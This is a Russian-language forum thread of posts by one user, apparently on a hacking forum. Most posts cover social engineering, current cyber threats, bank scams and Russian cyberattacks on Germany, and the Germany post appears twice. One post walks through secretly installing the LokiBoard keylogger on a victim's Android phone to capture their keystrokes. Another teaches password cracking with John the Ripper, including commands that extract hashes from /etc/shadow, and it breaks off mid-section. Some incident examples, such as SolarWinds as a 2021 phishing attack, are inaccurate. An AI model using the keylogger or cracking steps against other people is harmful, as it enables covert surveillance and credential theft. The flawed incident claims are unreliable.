От автора NEW Авторские статьи / схемы заработка от BlackMast

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150

«На сегодняшний день нет такой технологии, которую нельзя было бы взломать с помощью социальной инженерии» - Френк Абигнейл.February 22, 2023




Вступить в наш чат


Если вы спросите специалиста по кибербезопасности: «Какое самое слабое звено в любой системе?» Ответ вас удивит — это люди.

Атака с использованием социальной инженерии — это тип кибератаки, в которой используются психологические манипуляции, чтобы заставить людей разгласить конфиденциальную информацию или выполнить действия, которые помогут злоумышленнику получить доступ к системе или личным данным. Эти атаки могут быть невероятно эффективными, а их последствия могут варьироваться от кражи личной информации до репутационного ущерба крупной компании и финансовых потерь.

В этой статье мы расскажем о различных видах атак социальной инженерии, методах, используемых злоумышленниками, и о том, как их предотвратить.





Виды атак социальной инженерии

Фишинг

Фишинговая атака — это атака с использованием социальной инженерии, включающая отправку электронных писем, сообщений под видом банка, интернет-магазина и других организаций, чтобы обманным путем заставить пользователей раскрыть свою личную информацию, такую как пароли или номера кредитных карт. Обычно фишинг относится к социальной инженерии, потому что в этом мошенничестве ключевую роль играет человеческая ошибка.

В 2018 году произошла крупная фишинговая атака, направленная на криптовалютную биржу Binance. Злоумышленники создали поддельный веб-сайт, который выглядел в точности как «Binance», и рассылали пользователям электронные письма с просьбой войти в свои учетные записи. Когда пользователи ввели свои учетные данные для входа, злоумышленники смогли получить доступ к их аккаунтам и украсть их криптовалюты.

Байтинг

Байтинг – метод, похожий на фишинг, также включающий в себя использование социальной инженерии. Его суть — заставить человека сделать то, что он обычно не делает, например, загрузить файл или открыть ссылку, предлагая определенное вознаграждение, такое как бесплатный подарок или скидку.

В 2011 году байтинг атака была направлена против Торговой палаты США. Нападавшие оставили USB-накопители на парковке штаб-квартиры Палаты. Когда сотрудники нашли их и подключили к своим компьютерам, было установлено вредоносное ПО, которое позволило злоумышленникам получить доступ к компьютерной сети Палаты.

Претекстинг

Обычно такая атака предполагает обращение к жертве по телефону с заранее заготовленным сценарием (претекстом), чтобы убедить человека раскрыть конфиденциальную информацию, например, данные кредитной карты.

В 2018 году атака со сценарием была направлена на город Атланта. Злоумышленники представились сотрудниками компании, предоставляющей ИТ-услуги по городу, и убедили настоящих сотрудников раскрыть свои учетные данные для входа в систему. Злоумышленники смогли установить программу-вымогатель в компьютерной сети города и потребовали выкуп.

Целевой фишинг

Целевой фишинг — тип атаки, когда фишинг-сообщение отправляется не группе случайных пользователей, а конкретному лицу. Мошенники тщательно собирают информацию о пользователе, чтобы максимально персонализировать сообщение и сделать фишинг более эффективным.

В 2016 году целевая фишинговая атака была направлена против Национального комитета Демократической партии США. Злоумышленники разослали электронные письма сотрудникам DNC с просьбой сбросить пароли электронной почты. Когда сотрудники нажали на ссылку в электронном письме, они попали на поддельный веб-сайт, который выглядел как страница входа в электронную почту DNC. Злоумышленники смогли украсть конфиденциальную информацию и слить ее общественности.

Тейлгейтинг

Чтобы взломать хорошо защищенную цель, хакеры могут даже попытаться проникнуть в штаб-квартиру компании. Самая популярная уловка, которую используют преступники, не заключается в подделке учетных данных, все намного проще: злоумышленник просто проходит за кем-то, когда тот открывает дверь. В зарубежных компаниях эту практику называют «тейлгейтинг». Находясь внутри здания, хакеры используют манипуляции и хитрые уловки: при помощи навыков социальной инженерии, они обходят охранников, получают доступ к компьютерам и даже крадут документы.

В 2019 году тейлгейтинг-атака была нацелена на технологическую компанию Кремниевой долины. Злоумышленник выдал себя за курьера и проследовал за сотрудником в здание компании. Оказавшись внутри, злоумышленник смог украсть несколько ноутбуков.

Методы социальной инженерии

Злоумышленники используют ряд методов, чтобы завоевать доверие своей жертвы и заставить ее сделать что-то, что противоречит ее интересам. Некоторые из этих методов включают в себя:

Острая необходимость. Создание ощущения срочности и безотлагательности помогает убедить людей действовать быстро, не задумываясь о последствиях.
Власть. Злоумышленники изображают из себя авторитетных лиц, таких как сотрудники правоохранительных органов или специалисты по ИТ-безопасности, чтобы втереться в доверие своей жертвы.
Эмоция. Игра на эмоциях, таких как страх или сочувствие помогает злоумышленникам манипулировать жертвой и добиться желаемого в кратчайший срок.
Дефицит. Следующий метод заключается в создании ощущения нехватки или ограниченности, чтобы убедить жертву предпринять немедленные действия, например совершить покупку или разгласить личную информацию.
Знакомство. Чтобы завоевать доверие, злоумышленники выдают себя за людей или организации, с которыми жертва знакома или чьими услугами пользуется, например коллега или банк.
Запугивание. Тактика запугивания, например, с помощью угроз судебного иска или физической расправы, подталкивает людей к необдуманным поступкам, таким как разглашение конфиденциальной информации.
Обратная социальная инженерия. При обратной социальной инженерии злоумышленник позиционирует себя как жертву, нуждающуюся в помощи. Как только жертва проявит сочувствие, злоумышленник может получить доступ к личным данным.

Важно быть в курсе новейших методов социальной инженерии и проявлять осторожность при взаимодействии с незнакомыми людьми или организациями, особенно в Интернете.

Меры предосторожности

Чтобы предотвратить атаки социальной инженерии, следует:

Быть осторожным с электронными письмами и сообщениями от неизвестных источников: не переходите по ссылкам и ничего не загружайте из вложений. Прежде чем предпринимать какие-либо действия, проверьте личность отправителя.
Используйте многофакторную аутентификацию. Она помогает обеспечить вас дополнительным уровнем защиты. Злоумышленник не сможет получить доступ к вашим данным, если не будет знать код, отправленный на ваш телефон.
Используйте надежные и уникальные пароли. Сложные пароли труднее угадать, что затрудняет задачу для злоумышленников.
Установите защитное программное обеспечение: установите антивирусное и антивредоносное программное обеспечение на все устройства, чтобы обнаруживать и предотвращать атаки.
Будьте бдительны: всегда будьте на чеку и сообщайте о любых подозрительных действиях в соответствующие органы.

Заключение

Атаки социальной инженерии становятся все более изощренными и опасными. Не стоит недооценивать злоумышленников, которые используют ряд тактик и методов, чтобы завоевать доверие своих жертв и манипулировать ими для получения желаемого. Чтобы предотвратить атаки с использованием социальной инженерии, отдельные пользователи и организации должны проявлять бдительность и принимать меры, необходимые для защиты от этих атак. Выполнив советы по безопасности, описанные в этой статье, вы можете помочь защитить себя от атак социальной инженерии.

На этом все. Удачи!


 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150



Вступить в наш чат

Количество кибератак растет по мере того, как мы становимся все более зависимыми от технологий и Интернета. Новые киберугрозы постоянно развиваются, становятся все более изощренными и непредсказуемыми, что затрудняет защиту наших данных. Чтобы суметь предотвратить риски, важно быть в курсе последних событий в мире хакинга.

В этой статье мы расскажем вам о новых киберугрозах с примерами из жизни и поделимся практическими советами о том, как защитить себя.





Атаки программ-вымогателей

Атаки программ-вымогателей — одни из самых разрушительных типов кибератак. Программа-вымогатель — это разновидность вредоносного ПО, которое шифрует ваши файлы и требует выкупа в обмен на ключ дешифрования. Такие атаки наносят значительный ущерб пользователям и компаниям, часто приводя к потере и краже данных.

Более того, в последние годы злоумышленники стали более изощренными и применяют новые тактики, такие как двойное вымогательство, при котором они сначала крадут данные, а затем шифруют их, чтобы потребовать выкуп.

В 2021 году атака программы-вымогателя была нацелена на Colonial Pipeline, крупный топливный трубопровод в Соединенных Штатах, что привело к повсеместной нехватке топлива и паническим закупкам в нескольких штатах.

Защита от угроз программ-вымогателей

Чтобы защитить себя от атак программ-вымогателей, убедитесь, что у вас есть надлежащие резервные копии ваших данных.
Также регулярно обновляйте свое программное обеспечение и соблюдайте осторожность при открытии электронных писем, сообщений из неизвестных источников.
Регулярное сканирование ваших устройств на наличие уязвимостей может помочь вам обнаружить программу-вымогатель.

Фишинговые атаки

Фишинговые атаки — это тип кибератаки, при которой жертву обманом заставляют сообщать личную информацию, такую как учетные данные для входа, номера кредитных карт и другие конфиденциальные данные.

Злоумышленники используют различные тактики, такие как электронные письма, сообщения или телефонные звонки. Фишинговые атаки широко распространены и представляют значительный риск для доверчивых и невнимательных пользователей. Киберпреступники становятся все более виртуозными в создании убедительных сценариев, поддельных веб-сайтов и страниц для входа.

В 2021 году произошла фишинговая атака на компанию-разработчика программного обеспечения SolarWinds, которая привела к крупному сбою поставок и затронула несколько государственных учреждений и частных компаний США.

Защита от фишинговых угроз

Чтобы защитить себя от фишинговых атак, всегда будьте осторожны при переходе по ссылкам или загрузке файлов из неизвестных источников.
Убедитесь, что у вас установлено ПО для защиты от фишинга.
Регулярно обновляйте программное обеспечение и антивирус.
Относитесь с подозрением к любым нежелательными сообщениям и звонкам из неизвестных источников.

Безопасность Интернета вещей (IoT)

Интернет вещей (IoT) — это сеть физических устройств, транспортных средств и других объектов, оснащенных датчиками, программным обеспечением и средствами связи, что позволяет им подключаться и обмениваться данными. Эти устройства имеют много преимуществ, но они также представляют значительный риск для безопасности. Устройства IoT могут быть уязвимы для атак и могут использоваться для получения доступа к другим частям сети.

В 2021 году в популярной системе умных дверных замков была обнаружена уязвимость, которая позволила злоумышленникам удаленно открывать двери без особого труда. Таким образом, эта уязвимость долго использовалась для получения доступа к чужим домам и предприятиям.

Защита от IoT-угроз

Чтобы защитить себя от угроз безопасности IoT, важно убедиться, что вы меняете пароли по умолчанию на устройствах IoT и поддерживаете их программное обеспечение в актуальном состоянии.
Для дополнительной защиты используйте отдельную сеть для IoT устройств, чтобы изолировать их.
Кроме того, регулярно проверяйте свои устройства на наличие подозрительной активности и отключайте все неиспользуемые функции.

Облачная безопасность

Облачные хранилища становятся все более популярными, но также имеют свои уязвимости в безопасности. Облачная безопасность относится к защите данных и приложений, размещенных на удаленных серверах.

В 2021 году неправильно настроенный облачный сервер привел к утечке данных, в результате которой была раскрыта личная информация миллионов пользователей популярного мобильного приложения.

Как защитить свое облачное хранилище

Чтобы защитить себя от угроз, важно выбирать надежных облачных провайдеров, использовать надежные пароли и включать многофакторную аутентификацию.
Вы также должны регулярно проверять свои облачные хранилища на предмет необычной активности и шифровать данные.

Внутренние угрозы

Внутренние угрозы происходят со стороны сотрудников или подрядчиков, имеющих доступ к конфиденциальной информации. Они могут быть как умышленными, так и непреднамеренными. В первом случае лица могут случайным образом совершить ошибку по невнимательности, которая приведет к подрыву безопасности. Во втором же — это запланированная операция сотрудниками, имеющими конфиденциальный доступ к данным.

В 2013 году Эдвард Сноуден, подрядчик Агентства национальной безопасности (АНБ), передал в прессу секретную информацию о программах наблюдения агентства. Утечка стала одной из крупнейших в истории и нанесла значительный ущерб репутации АНБ.

Защита от внутренних угроз

Для защиты от внутренних угроз организации должны иметь четкие правила и процедуры для управления доступом конфиденциальными данными и системами. Они должны включать регулярное обучение сотрудников и подрядчиков тому, как выявлять подозрительное поведение и сразу же докладывать о нем.
Также важно отслеживать действия пользователей и внедрять средства управления безопасностью, такие как контроль доступа, предотвращение потери данных и аналитика поведения сотрудников.

Киберфизические атаки

Киберфизические атаки — это тип кибератак, направленных на физические системы или инфраструктуру (электрические сети, транспортные системы и промышленные системы управления). Они становятся все более распространенными по мере того, как системы все чаще зависят от технологий. Эти атаки могут повлечь за собой реальный ущерб и сбои в системе.

Одним из примеров киберфизической атаки является червь Stuxnet, который был обнаружен в 2010 году. Червь Stuxnet был разработан для атак на промышленные системы управления, используемые на ядерных объектах в Иране. Он смог нанести физический ущерб центрифугам, используемым при обогащении урана с помощью манипуляций их рабочими параметрами. Атака была сложной и требовала высокого уровня знаний для ее выполнения. Именно поэтому, многие убеждены, что это было осуществлено правительством.

Защита от киберфизических угроз

Для защиты от киберфизических атак организациям необходимо применять многоуровневый подход к безопасности:

Внедрение строгого контроля доступа и механизмов аутентификации для предотвращения неразрешенного доступа к критически важным системам.
Мониторинг систем на предмет подозрительной активности и внедрение средств безопасности, которые могут обнаруживать и предотвращать атаки.

Заключение

Рассмотренные выше примеры иллюстрируют реальное влияние киберугроз. Поскольку технологии продолжают развиваться, организациям и отдельным лицам важно сохранять бдительность и предпринимать шаги для защиты от возможных угроз. Будьте в курсе последних тенденций в области безопасности, а мы поможем минимизировать риск кибератак и защитить ваши конфиденциальные данные. На этом все. Удачи!

 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150



Вступить в наш чат


Что произошло

Нэнси Файзер, министр внутренних дел Германии, сообщила, что Германия сейчас подвержена «огромной опасности» со стороны русских хакеров. Риск диверсий, дезинформации и шпионских атак высок как никогда.

В своем сообщении Файзер заявила, что Владимир Путин вкладывает огромные ресурсы в кибератаки, что является ключевой частью его тактики. «Война усугубила проблемы кибербезопасности. Участились атаки пророссийских хакеров», — сказала она в интервью новостной сети Funke Mediengruppe, опубликованном в воскресенье.




Нэнси Файзер, министр внутренних дел Германии


По словам Файзер, опасность спонсируемой и управляемой государством шпионской и диверсионной деятельности со стороны России остается очень высокой. Министр внутренних дел призвала федеральное и региональное правительства к совместной работе по отражению кибератак. «Мы конкурируем с постоянно новыми способами атаки и технологиями», — сказала она.
В чем причина

С тех пор, как Германия начала поддерживать Украину поставками оружия и введением санкций против России, кибератаки участились, в частности, против поставщиков энергии и военных организаций. Эксперты по безопасности предупреждают о значительной опасности, которую они представляют для внутренней безопасности Германии, в частности, о способности кибератак атаковать критически важную инфраструктуру, а также политические операции, такие как Бундестаг. Также недавно российские хакеры взломали сайты аэропортов Германии, об этом мы писали в предыдущем выпуске.

Немецкий парламент стал целью одной из крупнейших кибератак, с которыми когда-либо сталкивалась Германия, в мае 2015 года, когда была атакована внутренняя компьютерная система, украдены данные и отключены офисы депутатов. Предполагается, что за атакой стоит ГРУ, российская военная разведка.





Были ли еще атаки

В 2020 году был взломан личный кабинет бывшего канцлера Ангелы Меркель. Тот взлом она назвала «возмутительным».

Хакерская группировка Ghostwriter, которая якобы находится под контролем российских спецслужб, вскоре после начала спецоперации провела несколько взломов в Германии. В последние недели кибератаки были совершены на все инфраструктуры: от аэропортов до администрации мэрии. Российская группа Killnet недавно объявила, что планирует обратить более пристальное внимание на разрушение жизни в Германии.

Эксперты в области цифровых технологий заявили, что Германия находится в состоянии «постоянного огня» со стороны хакеров. Финансовые институты, заводы по производству вооружений, поставщики энергии, гуманитарные организации и налоговые органы стали объектами атак. Эксперты говорят, что атаки часто хорошо замаскированы и определить их местоположение не так просто.

Вольфганг Вин, вице-президент берлинской службы внешней разведки BND, предупредил на конференции по безопасности в Потсдаме прошлым летом, что в цифровой мир Германии проникли хакеры из России и Китая. «Россия в наших сетях, Китай в наших сетях», — сказал он.
Как меняется ситуация

Марк Кортхаус из берлинской компании по информационной безопасности Sys11 сообщил газете Frankfurter Allgemeine, что атаки становятся все более политизированными. По словам Кортхауса, когда в этом месяце Германия приняла решение поставить Украине танки Leopard 2, количество атак на немецкие цели резко возросло.

«Атаки — предупредительный сигнал, и мы должны отнестись к этому серьезно». По его словам, за более простыми атаками часто следовали более технически сложные, причем первоначальные атаки часто рассматривались хакерами как «прощупывание почвы».

Александр Вуккевич, директор лабораторий защиты компании по информационной безопасности Avira: «Каждый раз, когда Европа усиливает свои санкции против России или ускоряет помощь Украине, хакеры усиливают свои атаки».





Когда Бундестаг проголосовал за поставки танков, была аналогичная активность, хотя парламент смог отразить атаки на свою собственную сеть. Во время Мюнхенской конференции по безопасности, на которой главной темой обсуждения было российское вторжение в Украину, хакеры атаковали ИТ-системы НАТО. Когда Болгария заявила, что поддерживает Украину, Killnet атаковала правительственные компьютеры в Софии, сказал Вуккевич.
Заключение

Похоже, что российские хакеры перешли в режим полной боевой готовности. Атаки на Германию становятся все более точными и болезненными для инфраструктуры страны.

В своих сообщениях хакерские группировки уточняют, что действуют лишь по политическим причинам. Разрушение привычной жизни жителей Германии является следствием действий их правительства. Команда BlackMast внимательно следит за развитием ситуации и каждую неделю рассказывает о новых кибератаках русских хакеров.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150



Вступить в наш чат


Что произошло

Нэнси Файзер, министр внутренних дел Германии, сообщила, что Германия сейчас подвержена «огромной опасности» со стороны русских хакеров. Риск диверсий, дезинформации и шпионских атак высок как никогда.

В своем сообщении Файзер заявила, что Владимир Путин вкладывает огромные ресурсы в кибератаки, что является ключевой частью его тактики. «Война усугубила проблемы кибербезопасности. Участились атаки пророссийских хакеров», — сказала она в интервью новостной сети Funke Mediengruppe, опубликованном в воскресенье.




Нэнси Файзер, министр внутренних дел Германии


По словам Файзер, опасность спонсируемой и управляемой государством шпионской и диверсионной деятельности со стороны России остается очень высокой. Министр внутренних дел призвала федеральное и региональное правительства к совместной работе по отражению кибератак. «Мы конкурируем с постоянно новыми способами атаки и технологиями», — сказала она.
В чем причина

С тех пор, как Германия начала поддерживать Украину поставками оружия и введением санкций против России, кибератаки участились, в частности, против поставщиков энергии и военных организаций. Эксперты по безопасности предупреждают о значительной опасности, которую они представляют для внутренней безопасности Германии, в частности, о способности кибератак атаковать критически важную инфраструктуру, а также политические операции, такие как Бундестаг. Также недавно российские хакеры взломали сайты аэропортов Германии, об этом мы писали в предыдущем выпуске.

Немецкий парламент стал целью одной из крупнейших кибератак, с которыми когда-либо сталкивалась Германия, в мае 2015 года, когда была атакована внутренняя компьютерная система, украдены данные и отключены офисы депутатов. Предполагается, что за атакой стоит ГРУ, российская военная разведка.





Были ли еще атаки

В 2020 году был взломан личный кабинет бывшего канцлера Ангелы Меркель. Тот взлом она назвала «возмутительным».

Хакерская группировка Ghostwriter, которая якобы находится под контролем российских спецслужб, вскоре после начала спецоперации провела несколько взломов в Германии. В последние недели кибератаки были совершены на все инфраструктуры: от аэропортов до администрации мэрии. Российская группа Killnet недавно объявила, что планирует обратить более пристальное внимание на разрушение жизни в Германии.

Эксперты в области цифровых технологий заявили, что Германия находится в состоянии «постоянного огня» со стороны хакеров. Финансовые институты, заводы по производству вооружений, поставщики энергии, гуманитарные организации и налоговые органы стали объектами атак. Эксперты говорят, что атаки часто хорошо замаскированы и определить их местоположение не так просто.

Вольфганг Вин, вице-президент берлинской службы внешней разведки BND, предупредил на конференции по безопасности в Потсдаме прошлым летом, что в цифровой мир Германии проникли хакеры из России и Китая. «Россия в наших сетях, Китай в наших сетях», — сказал он.
Как меняется ситуация

Марк Кортхаус из берлинской компании по информационной безопасности Sys11 сообщил газете Frankfurter Allgemeine, что атаки становятся все более политизированными. По словам Кортхауса, когда в этом месяце Германия приняла решение поставить Украине танки Leopard 2, количество атак на немецкие цели резко возросло.

«Атаки — предупредительный сигнал, и мы должны отнестись к этому серьезно». По его словам, за более простыми атаками часто следовали более технически сложные, причем первоначальные атаки часто рассматривались хакерами как «прощупывание почвы».

Александр Вуккевич, директор лабораторий защиты компании по информационной безопасности Avira: «Каждый раз, когда Европа усиливает свои санкции против России или ускоряет помощь Украине, хакеры усиливают свои атаки».





Когда Бундестаг проголосовал за поставки танков, была аналогичная активность, хотя парламент смог отразить атаки на свою собственную сеть. Во время Мюнхенской конференции по безопасности, на которой главной темой обсуждения было российское вторжение в Украину, хакеры атаковали ИТ-системы НАТО. Когда Болгария заявила, что поддерживает Украину, Killnet атаковала правительственные компьютеры в Софии, сказал Вуккевич.
Заключение

Похоже, что российские хакеры перешли в режим полной боевой готовности. Атаки на Германию становятся все более точными и болезненными для инфраструктуры страны.

В своих сообщениях хакерские группировки уточняют, что действуют лишь по политическим причинам. Разрушение привычной жизни жителей Германии является следствием действий их правительства. Команда BlackMast внимательно следит за развитием ситуации и каждую неделю рассказывает о новых кибератаках русских хакеров.​
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150

Обзор Loki Board — бесплатный кейлоггер для Android
Вступить в наш чат
Опытные взломщики владеют сотнями инструментов, с помощью которых они могут красть учетные данные, взламывать системы кибербезопасности и многое другое. Возможно, самым действенным из всех приложений является кейлоггер. Кейлоггер — необходимый инструмент в арсенале каждого хакера, но, как и многие другие инструменты, он требует наличие Kali Linux. Однако, сегодня мы поделимся с вами карманным, а главное бесплатным кейлоггером для Android под названием LokiBoard.

Что такое кейлоггер
Кейлоггер — своеобразный клавиатурный шпион, который собирает нажатия клавиш и ведет учет всей сохраненной информации. Кейлоггер чаще всего используется для сбора конфиденциальных данных, например, паролей.

Кейлоггеры остаются незамеченными в течение длительного времени, регистрируя действия с клавиатуры и давая злоумышленнику возможность ближе подобраться к личной информации жертвы. Кейлоггеры крайне опасны для жертвы, потому что их трудно обнаружить, но очень эффективны для хакеров.

Сегодня же речь пойдет о кейлоггере LokiBoard, который вы можете скачать прямо на телефон. Это простое в использовании приложение с открытым исходным кодом, которое необходимо установить на устройстве жертвы, после чего оно будет записывать все нажатия клавиш.

Скачать кейлоггер Lokiboard в Google Play.

Как использовать кейлоггер LokiBoard
Шаг 1: Установите приложение на устройство жертвы.

Шаг 2: Откройте раздел «Язык и ввод» в настройках системы Android.

Шаг 3: Включите Lokiboard и отключите все другие формы ввода, чтобы использовалось только наше приложение.

Шаг 4: Поскольку иконка приложения отсутствует на главном экране по понятным причинам, войти в LokiBoard можно, коснувшись LokiBoard в разделе языка и ввода в настройках.

Шаг 5: Как только жертва наберет текст на клавиатуре, все нажатия клавиш автоматически будут сохранены, и с помощью файлового менеджера вы сможете легко получить доступ к данным кейлоггера.

Путь, по которому будут сохранены нажатия показан ниже:


Вот и все. Это был один из самых известных кейлоггеров для Android, благодаря которому вы можете получить доступ к личной информации жертвы прямо в телефоне без использования Kali Linux. Надеемся, что данная статья оказалась полезной для вас. Удачи!
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150

Банковское мошенничество: выводим злоумышленников на чистую воду
Вступить в наш чат
В последнее время число банковских афер выросло до такой степени, что уже невозможно оставаться в стороне, игнорируя риски. Киберпреступники становятся все умнее и изобретательнее, когда дело касается взлома с помощью социальной инженерии. Наверняка, каждому из вас хоть раз поступал звонок или приходило сообщение, отправителем которого якобы являлся банк. Ключ к вашей безопасности — умение отличать подлинное сообщение от мошеннических уловок.
Узнайте, какие приемы используют банковские мошенники, а также 10 клише-сценариев, которые они активно применяют в своих злодеяниях.

1. «Подтвердите свою личность»
Сообщение, звонок или электронное письмо с просьбой предоставить конфиденциальную информацию, чтобы «подтвердить», что это вы.

Ваш банк может время от времени отправлять вам сообщения из соображений безопасности в случаях подозрительной активности на вашем счете — но банк никогда не попросит вас подтвердить вашу личность, предоставив секретную информацию по телефону или в виде сообщений.

Если вы сомневаетесь, то не нажимайте на ссылки, не отвечайте на электронные письма, не звоните по каким-либо номерам. Вместо этого позвоните в свой банк по его официальному номеру службы поддержки и убедитесь, что сообщение поступило от них.

2. «Обновите ваше банковское приложение»
Банки никогда не попросят вас установить или обновить приложение по электронной почте. При загрузке и обновлении всегда используйте официальный магазин приложений в вашем телефоне, избегая всех других источников, потому что, установив приложение из сообщения, ваша система будет скомпрометирована, а учетная запись взломана.

3. «Через 30 минут ваша карта будет заблокирована»
Если вам поступило сообщение о том, что ваша карта будет заблокирована, поэтому нужно срочно позвонить на какой-то номер или перейти по ссылке, не спешите это делать. Ваш банк может временно заморозить вашу карту в том случае, если была замечена подозрительная активность или мошенничество. Но банки не сообщают сроки по электронной почте или в сообщениях, тем более не закрывают счета без вашего ведома. Вместо этого, они предпримут необходимые юридические процедуры, и вы будете уведомлены об этом лично. Любое сообщение с дедлайном — фейк. Хакеры создают ощущение срочности и неотложности, чтобы у жертвы было как можно меньше времени на раздумья и проверку подлинности сообщения. В случае подозрительных сообщений звоните только на официальный номер своего банка.

4. «Сохраните документ во вложении»
Мошенники с помощью электронных писем распространяют документ зараженный банковским троянцем Emotet. С его помощью злоумышленники получают доступ к данным на устройствах. Как только пользователь откроет такое вложение, Emotet автоматически установится на компьютер, поставив под угрозу все пароли и безопасность.

Ваш банк не будет распространять приложения, документы и файлы таким образом — вместо этого попросит скачать из официального магазина приложений или с официального сайта.

5. «Отправили курьера, чтобы забрать вашу неисправную банковскую карту»
Вам поступает звонок от оператора банка, который сообщает, что ваша карта неисправна, поэтому требуется срочная замена. После чего оператор добродушно предлагает отправить курьера, чтобы тот передал новую карту и забрал старую. Когда курьер прибудет, он запросит PIN-код вашей карты в качестве «подтверждения». И вскоре – все ваши деньги волшебным образом исчезнут. Жертвами этого сценария стали тысячи людей — не поддавайтесь на такие аферы.

Если ваша карта действительно неисправна, то банк попросит вас лично приехать в офис для решения проблемы.

6. «Продиктуйте, пожалуйста, ваш CVV код»
Старый метод мошенничества, при котором вам поступает звонок либо из «полиции», либо из «вашего банка», где сообщается, что на вашей карте или банковском счёте была обнаружена мошенническая деятельность. Голос по телефону будет спекулировать юридическими терминами, ссылаться на правовые акты, пытаясь внушить вам законность своих действий, а затем мимоходом запросит у вас пароль или другую конфиденциальную информацию.

Банки никогда не будут запрашивать такие детали по телефону или в сообщениях. Не поддавайтесь на эти очевидные мошеннические схемы.

7. Фишинговая страница сайта банка
Злоумышленники создают поддельные сайты, которые в точности выглядит как настоящие. Единственная их разница — это URL-адрес, который незначительно отличается. Допустим, вы хотели попасть на сайт ВТБ, но по невнимательности открыли фишинговую ссылку «vtbb.ru» вместо официальной «vtb.ru» — вы оказались на фейковом сайте, который создали мошенники для компрометации банковских карт.
Внимательно проверяйте URL-адрес, чтобы убедиться, что это действительно настоящий веб-сайт. Вы всегда можете добавить ссылки на часто посещаемые страницы в быстрый поиск, так вы сэкономите время на проверки.

8. Обращение «Уважаемый клиент» или «Дорогой вашимейл@gmail.com»
Банки всегда будут обращаться к вам по имени и отчеству. Любые электронные письма, начинающиеся с «Уважаемый клиент» или «Уважаемый [адрес электронной почты]», являются поддельными, и в основном представляют собой автоматический спам, используемый для получения персональных данных или распространения вирусов. Не доверяйте ни одному электронному письму с такими очевидным обманом.

9. Сообщение с пустым адресным полем или с большим количеством упомянутых имейлов
Если вы получаете сообщение от вашего настоящего банка, оно должно быть адресовано только вам — не только в сообщении, но и в шапке письма. Убедитесь, что электронная почта совпадает с официальной, указанной на сайте.

10. Электронное письмо с просьбой подтвердить информацию
Если вы видите сообщение или электронное письмо с просьбой подтвердить какую-либо информациию, закройте его и позвоните в свой банк. Банк никогда не отправит подобных сообщений — в случае подозрительной активности вас попросят связаться с банком напрямую. Не отвечайте на такие письма, вместо этого сообщите о них как о спаме.

Заключение
Злоумышленники искусно владеют социальной инженерией и готовы пойти на все, чтобы обманным путем выведать у вас персональную информацию и банковские данные. Их приемы, хоть и являются, на первый взгляд, банальными, уже многие годы оставляют людей без денег на счетах. Попасть на удочку может любой — не только по глупости и доверчивости, но и по невнимательности. Если вы сомневаетесь в законности сообщения или звонка, обратитесь за профессиональной помощью в банк, чтобы защитить себя и свои деньги от банковского мошенничества. На этом все. Будьте внимательны и осторожны!
 

BlackMAST

Проверенный
Пресса
Регистрация
11 Июл 2020
Сообщения
192
Реакции
7
Total Sell
$0
Total Purchase
$150
Как взломать пароли с помощью John The Ripper (linux, zip, rar, hash)
Сегодня мы научимся взламывать пароли вместе с John The Ripper или, как его еще называют, Джоном Потрошителем. Если вы никогда не слышали об этом инструменте, то вы многое пропустили. Джон Потрошитель — это утилита для взлома паролей с открытым исходным кодом, которой активно пользуются все взломщики. Многофункциональность и большие возможности инструмента сделали его фаворитом многих людей в хакерском сообществе.

Что такое John the Ripper
Как упоминалось ранее, John the Ripper — это инструмент для взлома паролей, разработанный OpenWall, который по умолчанию включен в Kali Linux. Он может автоматически обнаруживать и расшифровывать хешированные пароли, что является стандартным способом хранения паролей во всех операционных системах. Джон Потрошитель является полноценным инструментом для взлома паролей, но также имеет платные версии с дополнительными функциями.

Итак, давайте приступим к взлому.

Скачать бесплатную версию Джона можно здесь.

Если у вас Kali Linux, то утилита уже предустановлена.

Мы подготовили следующие 4 руководства для взлома паролей с помощью John The Ripper:

1. Взлом паролей Linux;

2. Взлом файлов Zip, Rar, защищенных паролем;

3. Расшифровка хэш-файлов;

4. Использование списка слов для взлома паролей.



1. Взлом паролей Linux
Если вы пользуетесь Kali Linux не первый день, то вы знаете, что в этой ОС пароли хранятся в теневом файле, который хеширован и защищен. Кроме того, вы не можете напрямую просматривать файлы. Но с Джоном это становится выполнимым, потому что теперь получить доступ к паролю Linux можно за считанные минуты.

Чтобы взломать пароль Linux с помощью John The Ripper, введите в терминале следующую команду:

  • unshadow /etc/passwd /etc/shadow > crack.txt
unshadow — это команда, которая может извлекать хеши и отправлять их в файл crack.txt. Джон может использовать эти файлы с сохраненными хэшами для их взлома.

В зависимости от сложности пароля время, необходимое для его взлома, будет меняться. Кроме того, если вы используете список слов, пароль должен присутствовать в списке слов.

Если вы не видите пароль или хотите увидеть его снова, введите следующую команду:

  • cat /root/.john/john.pot
Где test123 это пароль

Примечание: Имейте ввиду, что взлом пароля требует больших ресурсов, поэтому ваши ПК могут нагреваться, если нет надлежащего охлаждения.

2. Взлом файлов Zip и Rar, защищенных паролем
Мы довольно часто сталкиваемся с запароленными zip-файлами, в частности, если загружаем что-то из Интернета. Так, давайте попробуем взломать пароль zip-файла.

Откройте папку, в которой находится zip-файл. В терминале смените каталог с помощью команды cd и введите следующую команду:

  • zip2john file > output.txt
file = имя zip файла

После использования этой команды вы увидите файл output.txt, в котором хранятся хэши zip-файла.

Чтобы взломать хэш zip-файла, введите:

  • john –format=zip output.txt
С помощью этой команды начнется процесс взлома zip пароля. Обратите внимание, что это займет N-время, в зависимости от сложности пароля.

В случае взлома паролей файлов «rar» просто замените «zip» на «rar». Например:

  • rar2john file > output.txt
  • John –format=rar output.txt
Все остальные действия остаются неизменными.

3. Расшифровка хеш-файлов
В качестве подготовки вам нужно сохранить хэш, который вы хотите расшифровать, в текстовом файле. Теперь давайте воспользуемся Джоном для расшифровки хэша и доступа к паролю.

Чтобы расшифровать его, используйте LM Хэши:

SHA1

Чтобы расшифровать SHA1, мы будем использовать RockYou из списка слов и взламывать пароль, как показано ниже:

